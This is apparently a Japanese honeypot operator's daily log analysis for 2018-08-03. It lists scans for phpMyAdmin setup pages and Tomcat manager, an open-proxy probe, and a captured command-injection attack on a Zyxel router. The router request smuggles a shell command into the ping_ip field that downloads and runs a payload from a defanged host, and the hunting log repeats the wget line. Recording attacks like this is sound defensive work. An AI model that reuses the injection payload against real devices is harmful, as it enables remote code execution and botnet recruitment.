WOWhoneypotの2018-08-03(運用 日目)の簡易分析です。
本日の総アクセス件数は 55件です。最近またアクセス数が少ないシーズンのようです。
以下が全アクセスログです。

30 2018-08-03 GET /
3 2018-08-03 GET /pma/scripts/setup.php
3 2018-08-03 GET /phpMyAdmin/scripts/setup.php
3 2018-08-03 GET /phpmyadmin/scripts/setup.php
3 2018-08-03 GET /MyAdmin/scripts/setup.php
3 2018-08-03 GET /myadmin/scripts/setup.php
2 2018-08-03 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-03 GET /scripts/setup.php
1 2018-08-03 GET /mysql/scripts/setup.php
1 2018-08-03 GET /mysqladmin/scripts/setup.php
1 2018-08-03 GET /myAdmin/scripts/setup.php
1 2018-08-03 GET /manager/html
1 2018-08-03 GET hxxp://112.124.127[.]162:83/index.php
1 2018-08-03 GET HTTP/1.1
1 2018-08-03 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 

phpMyAdmin関連（19件）と/を除外したアクセス数です。

2 2018-08-03 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-03 GET /manager/html
1 2018-08-03 GET hxxp://112.124.127[.]162:83/index.php
1 2018-08-03 GET HTTP/1.1
1 2018-08-03 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 

上から準備に
・ ZmEuによるphpMyAdminへのスキャンが2回
・Tomcatの管理ページの存在調査
・不正中継の調査
・多分パス指定ミス
・Gemini/2.0によるZyxel製ルータの脆弱性を突く攻撃

です。

本日のハンティングログは以下です。Gemini/2.0のものです。

1 2018-08-03 wget hxxp://178.128.11[.]199/rvs 

以上です。